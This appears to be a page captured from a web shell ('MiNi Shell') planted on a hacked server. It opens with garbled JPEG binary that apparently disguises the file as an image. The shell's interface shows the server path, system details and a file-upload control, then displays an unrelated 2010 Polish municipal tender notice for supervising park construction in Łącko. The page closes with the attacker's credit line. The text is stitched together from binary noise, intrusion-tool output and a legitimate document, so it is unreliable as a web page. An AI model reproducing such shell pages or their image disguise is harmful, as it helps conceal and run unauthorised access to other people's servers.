JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/13030-N-2010.html

<p class="kh_header"><b>Łącko: Pełnienie  nadzoru  inwestorskiego  nad  robotami  związanymi  z  realizacją   zadania  pn: Budowa parku rekreacyjno - wypoczynkowego wraz z budynkiem  poczekalni przy zajeździe  autobusowym w centrum wsi  Łącko</b><br>
<b>Numer ogłoszenia: 13030 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Gminy , Łącko 445, 33-390 Łącko, woj. małopolskie, tel. 018 4140710, faks 018 4140740.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lacko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie  nadzoru  inwestorskiego  nad  robotami  związanymi  z  realizacją   zadania  pn: Budowa parku rekreacyjno - wypoczynkowego wraz z budynkiem  poczekalni przy zajeździe  autobusowym w centrum wsi  Łącko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwa zamówienia:

Pełnienie  nadzoru  inwestorskiego  nad  robotami  związanymi  z  realizacją   zadania  pn:
Budowa parku rekreacyjno - wypoczynkowego wraz z budynkiem  poczekalni przy zajeździe  autobusowym w centrum wsi  Łącko

Opis przedmiotu zamówienia.
Przedmiotem zamówienia jest pełnienie  nadzoru inwestorskiego :  

Branża  konstrukcyjno - budowlana 
- wykonanie robót przygotowawczych, rozbiórkowych, ziemnych
- wykonanie  ogrodzenia 
- wykonanie  fontanny  oraz oczka wodnego z nawadnianiem
- wykonanie placu zabaw
- budowa budynku poczekalni

Branża  drogowa  
- remont drogi wzdłuż parku z chodnikiem
- wykonanie chodników i placów  na terenie parku
- wykonanie dojazdu i parkingu od strony policji

Branża  instalacyjna  w  zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych
- wykonanie przyłącza  wodociągowego kanalizacyjnego instalacje  wewnętrzne  w budynku poczekalni

Branża  instalacyjna  w  zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, i
telekomunikacyjnej

-  wykonanie przyłącza  energetycznego , oświetlenie zasilanie  fontann, monitoring TV , przebudowa sieci TT, instalacje  
    wewnętrzne  w budynku poczekalni

Branża  ogrodnicza
- sadzenie roślin i roboty ogrodnicze
- wykonanie  fontanny  oraz oczka wodnego z nawadnianiem

Szczegółowy opis  przedmiotu zamówienia określa Szczegółowa  Specyfikacja Techniczna - stanowiąca załącznik nr 6  SIWZ przedmiar robót stanowiący załącznik nr 7 do SIWZ oraz  dokumentacja  projektowa  stanowiąca załącznik nr 8 do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy  którzy spełniają warunki  określone  w  22  ust.1 Ustawy  z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007 r. Nr 223 poz. 1655  z późniejszymi  zmianami w  ogłoszeniu o zamówieniu oraz w Specyfikacji Istotnych Warunków Zamówienia  (zwanej dalej   SIWZ).
O udzielenie zamówienia mogą ubiegać się Wykonawcy  którzy spełniają warunki dotyczące :
1)  posiadania  uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania  a w szczególności : przedłożenia koncesji ,zezwolenia lub licencji
2)  posiadania   wiedzy i doświadczenia a w szczególności : przedłożenia wykazu wykonanych , a w przypadku  świadczeń  okresowych lub ciągłych  również wykonywanych  usług w zakresie  niezbędnym  do wykazania  spełnienia warunku wiedzy  i doświadczenia  w okresie ostatnich  trzech lat przed upływem  terminu składania ofert  a jeżeli okres prowadzenia jest krótszy - w tym okresie , z podaniem  ich wartości , przedmiotu , dat wykonania  i odbiorców , oraz załączeniem dokumentu  potwierdzającego , że te usługi  zostały  lub są wykonywane  należycie - wg wzoru zał. nr 3 do SIWZ
Wykonawca  zobowiązany  jest  udokumentować  że  prowadził   co najmniej  2  nadzory inwestorskie   dotyczy  branży :
        a) konstrukcyjno - budowlanej,
        b) drogowej,
        c) instalacyjnej w  zakresie sieci, instalacji i urządzeń wodociągowych 
            i kanalizacyjnych
        d) instalacyjnej  w  zakresie sieci, instalacji, urządzeń elektrycznych, 
            elektroenergetycznych i  telekomunikacyjnej
        e) a  dla branży ogrodniczej  należy udokumentować   że  prowadził  nadzór , 
            kierował lub  wykonywał  co  najmniej  2  zadania  w  zakresie  nasadzeń  
            zieleni , krzewów , traw. 
3) dysponowania odpowiednim potencjałem technicznym  oraz  osobami zdolnymi do  wykonania zamówienia a w szczególności : przedłożenia wykazu  osób , które będą uczestniczyć w wykonywaniu zamówienia , w szczególności  odpowiedzialnych  za świadczenie  usług , kontrolę jakości  lub kierowanie  robotami budowlanymi , wraz z informacjami  na temat ich kwalifikacji  zawodowych , doświadczenia i wykształcenia  niezbędnych  dla wykonania zmówienia , a także zakresu wykonywanych  przez nie czynności , oraz informacją o podstawie  do dysponowania tymi osobami - wg wzoru  zał. nr 4 do SIWZ   Wykonawca  zobowiązany jest   przedłożyć   właściwe uprawnienia oraz  aktualne  zaświadczenie o  przynależności  do   właściwej  Okręgowej   Izby Inżynierów Budownictwa osób  przewidzianych  do  pełnienia  funkcji    inspektora  nadzoru  w  branży :
        a) konstrukcyjno - budowlanej,
        b) drogowej,
        c) instalacyjnej w  zakresie sieci, instalacji i urządzeń wodociągowych 
         i kanalizacyjnych
        d) instalacyjnej w  zakresie sieci, instalacji , urządzeń elektrycznych , 
            elektroenergetycznych i  telekomunikacyjnej
4) sytuacji  ekonomicznej i finansowej  a w szczególności  : przedłożenia opłaconej polisę , a w przypadku  jej braku  innego dokumentu  potwierdzającego, że wykonawca  jest ubezpieczony  od odpowiedzialności  cywilnej w zakresie  prowadzonej działalności  związanej z przedmiotem zamówienia , 
2.  Wykonawca może  polegać na wiedzy i doświadczeniu , potencjale technicznym , osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów , niezależnie  od charakteru prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu , iż będzie dysponował  zasobami niezbędnymi do realizacji zamówienia , w szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich  przy wykonaniu zmówienia . 

3. Zamawiający dokona oceny spełnienia warunków wg formuły spełnia - nie spełnia w oparciu o wymagane w cz. III SIWZ   dokumenty. Niespełnienie przez wykonawcę chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy   z postępowania .
Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.  

4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wykonawcy wspólnie ubiegający się o zamówienie, ponoszą solidarną odpowiedzialność za wykonanie umowy.

5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia , określone warunki winien spełniać jeden Wykonawca lub Wykonawcy wspólnie, 
6. Z postępowania o udzielenie zamówienia wyklucza się  wykonawców ,którzy podlegają wykluczeniu na podstawie przepisów  art.24 ust.1 i 2 Ustawy ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawcy składając ofertę na formularzu wg wzoru - zał. nr 1 do SIWZ  zobowiązani są w celu wykazania  spełnienia warunków udziału w postępowaniu oraz wykazania  braku podstaw  do wykluczenia  z postępowania  o udzielenie zamówienia wykonawcy  w okolicznościach o których mowa   w art.24 ust. 1 Ustawy   złożyć następujące dokumenty:
1)   oświadczenie o spełnieniu warunków w postępowaniu oraz  oświadczenie o braku podstaw wykluczenia  z powodu   niespełnienia  warunków o których mowa w art.24ust. ust. 1 Ustawy - wg wzoru zał. nr 2 do SIWZ  
2)  wykaz wykonanych , a w przypadku  świadczeń  okresowych lub ciągłych  również wykonywanych  usług w zakresie  niezbędnym  do wykazania  spełnienia warunku wiedzy  i doświadczenia  w okresie ostatnich  trzech lat przed upływem  terminu składania ofert  a jeżeli okres prowadzenia jest krótszy - w tym okresie , z podaniem  ich wartości , przedmiotu , dat wykonania  i odbiorców , oraz załączeniem dokumentu  potwierdzającego , że te usługi  zostały  lub są wykonywane  należycie - wg wzoru zał. nr 3 do SIWZ
Wykonawca  zobowiązany  jest  udokumentować  że  prowadził   co najmniej  2  nadzory inwestorskie   dotyczy  branży :
        a) konstrukcyjno - budowlanej,
        b) drogowej,
        c) instalacyjnej w  zakresie sieci, instalacji i urządzeń wodociągowych 
            i kanalizacyjnych
        d) instalacyjnej w  zakresie sieci, instalacji , urządzeń elektrycznych , 
            elektroenergetycznych i  telekomunikacyjnej
        a  dla branży ogrodniczej  należy udokumentować   że  prowadził  nadzór , kierował lub  wykonywał  co  najmniej   2  zadania  w  zakresie  nasadzeń  zieleni , krzewów , traw.
4)	wykaz  osób , które będą uczestniczyć w wykonywaniu zamówienia , w szczególności  odpowiedzialnych  za świadczenie  usług , kontrolę jakości  lub kierowanie  robotami budowlanymi , wraz z informacjami  na temat ich kwalifikacji  zawodowych , doświadczenia i wykształcenia  niezbędnych  dla wykonania zmówienia , a także zakresu wykonywanych  przez nie czynności , oraz informacją o podstawie  do dysponowania tymi osobami - wg wzoru  zał. nr 4 do SIWZ
   Wykonawca   zobowiązany  jest przedłożyć   właściwe uprawnienia oraz  aktualne  zaświadczenie o przynależności     do   właściwej  Okręgowej   Izby Inżynierów Budownictwa osób  przewidzianych  do  pełnienia  funkcji  inspektora  
nadzoru  w  branży :
        a) konstrukcyjno - budowlanej,
        b) drogowej,
        c) instalacyjnej w  zakresie sieci, instalacji i urządzeń wodociągowych 
            i kanalizacyjnych
        d) instalacyjnej w  zakresie sieci, instalacji , urządzeń elektrycznych , 
            elektroenergetycznych i  telekomunikacyjnej
5) opłaconą polisę , a w przypadku  jej braku  innego dokumentu  potwierdzającego, że wykonawca  jest ubezpieczony  od odpowiedzialności  cywilnej w zakresie  prowadzonej działalności  związanej z przedmiotem zamówienia , 
6) aktualny odpis z właściwego  rejestru , jeżeli  odrębne przepisy wymagają  wpisu do rejestru , w celu  wykazania braku podstaw do wykluczenia w oparciu  o art. 24 ust. 1 pkt. 2  Ustawy  wystawionego nie wcześniej niż  6 m-cy  przed upływem terminu  składania  ofert , a w stosunku do osób fizycznych  oświadczenie w zakresie  art.24 ust 1 pkt.2,
7) w przypadku gdy Wykonawca  polega na wiedzy i doświadczeniu , potencjale technicznym , osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów , niezależnie  od charakteru prawnego łączących go z nimi stosunków. Wykonawca  w takiej sytuacji zobowiązany jest przedstawić   pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich  przy wykonaniu zamówienia .

2.  Jeżeli wykonawca  wykazując spełnienie warunków w postępowaniu -cz. II pkt. 1 podp. 1)2)3) SIWZ polega na   zasobach  innych podmiotów   na zasadach  określonych w art. 26 ust.2b ustawy  , a podmioty te będą brały    udział  w realizacji  części zamówienia , wykonawca  przedstawi  w odniesieniu  do tych podmiotów  dokumenty   wymienione w cz. III pkt 1 podp. 1) . 6).
5.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia złożą Pełnomocnictwo dla pełnomocnika,  do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i  zawarcia umowy w sprawie zamówienia publicznego.
6.Wymagane dokumenty mogą być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez   Wykonawcę.
W przypadku, gdy złożona kopia dokumentu jest nieczytelna lub budzi  wątpliwości co do jej prawdziwości  zamawiający   może żądać przedstawienia oryginału lub notarialnie poświadczonej  kopii dokumentu.
7.Jeżeli , w przypadku wykonawcy mającego  siedzibę  na terytorium Rzeczypospolitej Polskiej  , osoby , o których mowa w art. 24 ust 1 pkt 5-8  ustawy mają miejsce  zamieszkania poza terytorium Rzeczypospolitej  Polskiej , wykonawca  składa w odniesieniu  do nich zaświadczenie  właściwego organu sądowego  albo administracyjnego  miejsca zamieszkania  dotyczące  niekaralności tych osób  w zakresie  określonym  w art.24 ust 1 pkt 5-8  ustawy , wystawione nie wcześniej  niż 6 miesiecy przed upływem terminu  składania  ofert , z tym że  w przypadku , gdy w miejscu zamieszkania  tych osób  nie wydaje się takich  zaświadczeń - zastępuje je  dokumentem  zawierającym  oświadczenie złożone  przed notariuszem , właściwym  organem sądowym , administracyjnym  albo organem  samorządu  zawodowego  lub gospodarczego  miejsca zamieszkania tych osób.
8. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa w cz. III pkt. 1. SIWZ : 
1)  w podp. 6 - składa dokument lub dokumenty  wystawione w kraju , w którym ma siedzibę  lub miejsce zamieszkania potwierdzające odpowiednio ,że : 
a) nie otwarto jego likwidacji ani nie ogłoszono  upadłości ,
b) nie zalega z uiszczaniem  podatków , opłat składek na ubezpieczenie społeczne i zdrowotne  albo, że  uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub   wstrzymanie w całości wykonania  decyzji właściwego organu , 
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie 
9. Dokumenty o których mowa w pkt. 8podp. 1)a i 1)c  powinny być wystawione  nie wcześniej niż  6 miesięcy  przed upływem terminu składania  wniosków o dopuszczenie  do udziału w postępowaniu o udzielenie  zamówienia  albo  składania ofert.
Dokument o których mowa w pkt. 8podp. 1)b   powinien być wystawiony  nie wcześniej niż  3 miesiące  przed upływem terminu składania  wniosków o dopuszczenie  do udziału w postępowaniu o udzielenie  zamówienia  albo  składania ofert.
10. Jeżeli w miejscu zamieszkania osoby  lub  w kraju  w którym wykonawca  ma siedzibę  lub miejsce zamieszkania , nie wydaje się  dokumentów o których mowa w pkt. 8.  zastępuje się je  dokumentem zawierającym  oświadczenie złożone przed notariuszem , właściwym organem sądowym , administracyjnym  albo organem samorządu  zawodowego lub  gospodarczego  odpowiednio  miejsca zamieszkania  osoby lub kraju , w którym  wykonawca ma siedzibę  lub miejsce zamieszkania .
11. W przypadku  wykonawców wspólnie  ubiegających się  o udzielenie zamówienia  oraz w przypadku  podmiotów , o których mowa w cz. II pkt 2 SIWZ, kopie dokumentów  dotyczących  odpowiednio wykonawcy  lub t ych podmiotów  są poświadczane  za zgodność z oryginałem  przez wykonawcę lub te podmioty.
12. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lacko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łącko
33-390 Łącko 445 pok. 21.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2010 godzina 10:00, miejsce: Urząd Gminy Łącko
33-390 Łącko 445 pok. 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com